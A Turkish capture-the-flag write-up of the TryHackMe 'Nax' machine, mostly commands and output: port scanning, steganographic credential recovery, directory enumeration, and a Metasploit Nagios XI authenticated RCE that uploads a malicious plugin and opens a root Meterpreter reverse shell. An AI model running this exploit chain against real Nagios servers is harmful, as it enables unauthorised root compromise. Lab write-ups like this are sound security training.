TryHackMe – Nax Makine Çözümü

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Merhabalar, bu yazımda sizlere TryHackMe platformunda bulunan “Nax” isimli makinenin çözümü anlatacağım. Keyifli Okumalar…


1 — Nmap aracını kullanarak makine üzerindeki açık portlar ve servisler hakkında detaylı bilgi ediniyorum.

[root:/home/alper/Desktop/TRYHACKME]# nmap -sS -sV
Starting Nmap 7.94 ( ) at 2023-06-10 10:43 +03
Nmap scan report for
Host is up (0.079s latency).
Not shown: 995 closed tcp ports (reset)
22/tcp  open  ssh      OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
25/tcp  open  smtp     Postfix smtpd
80/tcp  open  http     Apache httpd 2.4.18 ((Ubuntu))
389/tcp open  ldap     OpenLDAP 2.2.X - 2.3.X
443/tcp open  ssl/http Apache httpd 2.4.18 ((Ubuntu))
Service Info: Host:  ubuntu.localdomain; OS: Linux; CPE: cpe:/o:linux:linux_kernel

2 — Sayfa kaynağını incelediğimde bazı sayılar görüyorum. Bunların bazı harflerin ASCII karşılığı olduğunu düşünüyorum ve çevirdiğim zaman “/PI3T.PNg” kelimesine ulaşıyorum.

47, 80, 73, 51, 84, 46, 80, 78, 103
/,  P,  I,  3,  T,  .,  P,  N,  g

[root:/home/alper/Desktop/TRYHACKME]# wget
--2023-06-10 10:47:37--
Connecting to connected.
HTTP request sent, awaiting response... 200 OK
Length: 982359 (959K) [image/png]
Saving to: ‘PI3T.PNg’

PI3T.PNg                                                    100%[=========================================================================================================================================>] 959.33K  2.30MB/s    in 0.4s    

2023-06-10 10:47:38 (2.30 MB/s) - ‘PI3T.PNg’ saved [982359/982359]

3 — İndirdiğim dosyayı GIMP aracı ile açıp “ppm” uzantılı olarak kaydediyorum. Daha sonra NPIET aracı ile ppm dosyasını çözüyorum. Buradan “nagiosadmin” ve parola bilgisi elde ediyorum.

[root:.../alper/Downloads/npiet-1.3f]# ./npiet /home/alper/Desktop/TRYHACKME/PI3T.ppm

4 — Dizin taraması başlatıyorum.

[root:/home/alper/Desktop/TRYHACKME]# gobuster dir -u -w /usr/share/wordlists/dirb/common.txt                        
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
[+] Url:           
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.5
[+] Timeout:                 10s
2023/06/10 10:56:45 Starting gobuster in directory enumeration mode
/.htaccess            (Status: 403) [Size: 277]
/.hta                 (Status: 403) [Size: 277]
/.htpasswd            (Status: 403) [Size: 277]
/cgi-bin/             (Status: 403) [Size: 277]
/index.html           (Status: 200) [Size: 1332]
/index.php            (Status: 200) [Size: 2968]
/javascript           (Status: 301) [Size: 317] [-->]
/nagios               (Status: 401) [Size: 459]
/server-status        (Status: 403) [Size: 277]

5 — “/nagios” dizinine gidip giriş yapıyorum. Sürümün 4.4.2 olduğunu görüyorum. Nagios, CVE raporlarını araştırdığımda “Nagios XI before 5.6.6 allows remote command execution as root” açıklamasıyla CVE-2019–15949 ID li CVE raporunu görüyorum.

6 — “Metasploit-framework” içerisindeki nagios modüllerini inceliyorum.

msf6 > search nagios

Matching Modules

   #   Name                                                                 Disclosure Date  Rank       Check  Description
   -   ----                                                                 ---------------  ----       -----  -----------
   0   exploit/linux/misc/nagios_nrpe_arguments                             2013-02-21       excellent  Yes    Nagios Remote Plugin Executor Arbitrary Command Execution
   1   exploit/linux/http/nagios_xi_snmptrap_authenticated_rce              2020-10-20       excellent  Yes    Nagios XI 5.5.0-5.7.3 - Snmptrap Authenticated Remote Code Exection
   2   exploit/linux/http/nagios_xi_configwizards_authenticated_rce         2021-02-13       excellent  Yes    Nagios XI 5.5.6 to 5.7.5 - ConfigWizards Authenticated Remote Code Exection
   3   exploit/linux/http/nagios_xi_mibs_authenticated_rce                  2020-10-20       excellent  Yes    Nagios XI 5.6.0-5.7.3 - Mibs.php Authenticated Remote Code Exection
   4   exploit/linux/http/nagios_xi_autodiscovery_webshell                  2021-07-15       excellent  Yes    Nagios XI Autodiscovery Webshell Upload
   5   exploit/linux/http/nagios_xi_chained_rce                             2016-03-06       excellent  Yes    Nagios XI Chained Remote Code Execution
   6   exploit/linux/http/nagios_xi_chained_rce_2_electric_boogaloo         2018-04-17       manual     Yes    Nagios XI Chained Remote Code Execution
   7   post/linux/gather/enum_nagios_xi                                     2018-04-17       normal     No     Nagios XI Enumeration
   8   exploit/linux/http/nagios_xi_magpie_debug                            2018-11-14       excellent  Yes    Nagios XI Magpie_debug.php Root Remote Code Execution
   9   exploit/unix/webapp/nagios_graph_explorer                            2012-11-30       excellent  Yes    Nagios XI Network Monitor Graph Explorer Component Command Injection
   10  exploit/linux/http/nagios_xi_plugins_check_plugin_authenticated_rce  2019-07-29       excellent  Yes    Nagios XI Prior to 5.6.6 Authenticated Remote Command Execution
   11  exploit/linux/http/nagios_xi_plugins_filename_authenticated_rce      2020-12-19       excellent  Yes    Nagios XI Prior to 5.8.0 - Plugins Filename Authenticated Remote Code Exection
   12  auxiliary/scanner/http/nagios_xi_scanner                                              normal     No     Nagios XI Scanner
   13  exploit/unix/webapp/nagios3_history_cgi                              2012-12-09       great      Yes    Nagios3 history.cgi Host Command Execution
   14  exploit/unix/webapp/nagios3_statuswml_ping                           2009-06-22       excellent  No     Nagios3 statuswml.cgi Ping Command Execution

7 — Raporun açıklamasından yola çıkarak “exploit/linux/http/nagios_xi_plugins_check_plugin_authenticated_rce” modülünü kullanıyorum.

msf6 exploit(linux/http/nagios_xi_plugins_check_plugin_authenticated_rce) > set LHOST
msf6 exploit(linux/http/nagios_xi_plugins_check_plugin_authenticated_rce) > set RHOSTS
msf6 exploit(linux/http/nagios_xi_plugins_check_plugin_authenticated_rce) > set PASSWORD *CENSORED*
msf6 exploit(linux/http/nagios_xi_plugins_check_plugin_authenticated_rce) > run

[*] Started reverse TCP handler on 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Attempting to authenticate to Nagios XI...
[+] Successfully authenticated to Nagios XI.
[*] Target is Nagios XI with version 5.5.6.
[+] The target appears to be vulnerable.
[*] Uploading malicious 'check_ping' plugin...
[*] Command Stager progress - 100.00% done (897/897 bytes)
[+] Successfully uploaded plugin.
[*] Executing plugin...
[*] Waiting up to 300 seconds for the plugin to request the final payload...
[*] Sending stage (3045348 bytes) to
[*] Meterpreter session 1 opened ( -> at 2023-06-10 11:05:28 +0300
[*] Deleting malicious 'check_ping' plugin...
[+] Plugin deleted.

meterpreter >

8 — Root kullanıcısı ile 2 bayrağı da elde ediyorum.

meterpreter > shell
Process 10231 created.
Channel 1 created.
SHELL=/bin/bash script -q /dev/null
root@ubuntu:/usr/local/nagiosxi/html/includes/components/profile# cd /home 
cd /home
root@ubuntu:/home# ls
root@ubuntu:/home# cd galand
cd galand
root@ubuntu:/home/galand# ls
nagiosxi  user.txt
root@ubuntu:/home/galand# cat user.txt
cat user.txt
root@ubuntu:/home/galand# cat /root/root.txt
cat /root/root.txt